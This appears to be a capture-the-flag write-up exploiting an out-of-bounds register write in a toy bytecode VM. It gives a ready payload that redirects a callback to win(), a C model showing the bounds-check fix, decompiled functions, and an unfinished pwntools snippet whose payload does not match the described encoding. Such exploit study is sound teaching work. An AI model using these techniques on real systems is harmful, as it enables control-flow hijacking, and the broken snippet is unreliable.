Isaimini.6

The store handler boils down to `regs[dst] = regs[src];`, where `dst` is taken directly from the user-controlled register index byte. The interpreter never verifies that `dst` is within 0-15. If we use a register index of 0x10 (16), `regs[16]` points one qword past the 16-entry register array, landing in the .bss area where the global variable `callback` lives. The payload below therefore loads the address of `win` (0x401b10) and copies it through the out-of-bounds index so that the next use of `callback` jumps to `win`:

    # Make the binary executable
    chmod +x isaimini.6

    # Send the payload via stdin. It is written as a single printf pipeline
    # rather than payload=$(printf ...): command substitution drops the NUL
    # bytes inside the 64-bit immediate, which would corrupt the address.
    printf '\x01\x01\x10\x1b\x40\x00\x00\x00\x00\x00\x05\x10\x01\x09' | ./isaimini.6

When `win` runs the binary prints `Success!` instead of the usual `Failure!`.
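To make the layout argument concrete, here is a small C model of the interpreter, added for this page rather than taken from the challenge binary. The bytecode encoding (0x01 = load immediate, 0x05 = register-to-register copy, 0x09 = call through `callback`) is an assumption read off the payload bytes above; the 16 registers and `callback` are placed in one array to pin the adjacency the linker produced in .bss; and `win`/`fail` are stand-ins for the real functions. `demo(0)` runs the payload against the unchecked store, `demo(1)` against a bounds-checked one, and `payload_matches_page()` confirms that the assumed encoding reproduces the exact bytes from the page.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define NREGS 16

/* The interpreter's .bss as described above: 16 registers followed directly
 * by the `callback` pointer.  Modelled as one array so that regs[16] is a
 * well-defined write onto the callback slot in this demo (in the real
 * binary they are two adjacent globals placed there by the linker). */
struct vm_state {
    uint64_t bss[NREGS + 1];
};
#define REGS(vm)     ((vm)->bss)
#define CALLBACK(vm) ((vm)->bss[NREGS])

static int win_hits;
static void win(void)  { win_hits++; }   /* stand-in for the challenge's win() */
static void fail(void) { }               /* default callback (assumption) */

/* Assumed bytecode encoding, read off the payload bytes on the page:
 *   01 rr <imm64 LE>   regs[rr] = imm64        (load immediate)
 *   05 dd ss           regs[dd] = regs[ss]     (the vulnerable store)
 *   09                 callback()              (call through the global pointer) */
enum { OP_LOADI = 0x01, OP_MOVR = 0x05, OP_CALL = 0x09 };

static void vm_init(struct vm_state *vm)
{
    memset(vm, 0, sizeof *vm);
    CALLBACK(vm) = (uint64_t)(uintptr_t)fail;
}

/* Execute `len` bytes of bytecode.  check_bounds == 0 reproduces the bug:
 * register indices are used as-is.  Returns 0 on completion, -1 on a
 * malformed program or (checked mode only) an out-of-range register. */
static int vm_run(struct vm_state *vm, const uint8_t *code, size_t len, int check_bounds)
{
    size_t pc = 0;
    while (pc < len) {
        uint8_t op = code[pc++];
        switch (op) {
        case OP_LOADI: {
            if (pc + 1 + 8 > len) return -1;
            uint8_t r = code[pc++];
            if (check_bounds && r >= NREGS) return -1;
            uint64_t imm = 0;                      /* little-endian immediate */
            for (int i = 0; i < 8; i++) imm |= (uint64_t)code[pc + i] << (8 * i);
            pc += 8;
            REGS(vm)[r] = imm;
            break;
        }
        case OP_MOVR: {
            if (pc + 2 > len) return -1;
            uint8_t dst = code[pc++], src = code[pc++];
            /* The missing check: dst == 0x10 steps one slot past regs[] onto callback. */
            if (check_bounds && (dst >= NREGS || src >= NREGS)) return -1;
            REGS(vm)[dst] = REGS(vm)[src];
            break;
        }
        case OP_CALL:
            ((void (*)(void))(uintptr_t)CALLBACK(vm))();
            break;
        default:
            return -1;
        }
    }
    return 0;
}

/* Emit the page's 14-byte payload for a given win address: load win into r1,
 * copy r1 into "r16" (= callback), then call.  Returns the payload length. */
static size_t build_payload(uint8_t *out, uint64_t win_addr)
{
    size_t n = 0;
    out[n++] = OP_LOADI; out[n++] = 0x01;
    for (int i = 0; i < 8; i++) out[n++] = (uint8_t)(win_addr >> (8 * i));
    out[n++] = OP_MOVR;  out[n++] = 0x10; out[n++] = 0x01;
    out[n++] = OP_CALL;
    return n;
}

/* Returns 1 if the assumed encoding reproduces the exact bytes from the page. */
int payload_matches_page(void)
{
    static const uint8_t page_bytes[] = { 0x01, 0x01, 0x10, 0x1b, 0x40, 0x00, 0x00,
                                          0x00, 0x00, 0x00, 0x05, 0x10, 0x01, 0x09 };
    uint8_t buf[32];
    size_t n = build_payload(buf, 0x401b10);
    return n == sizeof page_bytes && memcmp(buf, page_bytes, n) == 0;
}

/* Run the exploit against the unchecked (buggy) or checked interpreter.
 * Returns 1 if win() ran, 0 if the callback stayed on fail(), -1 if rejected. */
int demo(int check_bounds)
{
    struct vm_state vm;
    uint8_t code[32];
    vm_init(&vm);
    win_hits = 0;
    size_t n = build_payload(code, (uint64_t)(uintptr_t)win);
    if (vm_run(&vm, code, n, check_bounds) != 0) return -1;
    return win_hits ? 1 : 0;
}

int main(void)
{
    printf("payload matches page bytes: %d\n", payload_matches_page());
    printf("unchecked interpreter: %d (1 = win() ran)\n", demo(0));
    printf("bounds-checked interpreter: %d (-1 = rejected)\n", demo(1));
    return 0;
}
```

Build with `cc -O2 -o vm vm.c && ./vm`. The fix is the single `dst >= NREGS` comparison in the 0x05 handler: with it in place the same program is rejected before the callback slot is touched, and the call never reaches `win`.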

Functions recovered from the binary (decompiler `FUN_` names next to the roles they play):

    FUN_00401000  entry point (main)
    FUN_00401200  parse_input
    FUN_00401430  execute
    FUN_00401780  op_add
    FUN_00401810  op_sub
    FUN_004018c0  op_load
    FUN_00401950  op_store
    FUN_00401b10  win

Cleaned-up decompilation of `main` and `win`:

    #include <stdio.h>
    #include <unistd.h>

    void parse_input(char *buf);   /* FUN_00401200 */
    void execute(void);            /* FUN_00401430 */

    int main(void)
    {
        char buf[256];
        read(0, buf, 256);         /* bytecode program read from stdin */
        parse_input(buf);
        execute();
        puts("Failure!");          /* reached after execute() returns normally */
        return 0;
    }

    void win(void)
    {
        puts("Success!");
        // In the real challenge this prints the flag, e.g.
        // system("/bin/cat flag.txt");
    }

    from pwn import *

    elf = ELF('./isaimini.6')

    # Build the payload
    win_addr = elf.symbols['win']   # 0x401b10
    payload = b""
    payload += p64(win_addr)        # MOV r1, win (will be replaced below)
    # p64() already returns the little-endian bytes; do not wrap it in asm(),
    # which expects assembly source text, not packed bytes.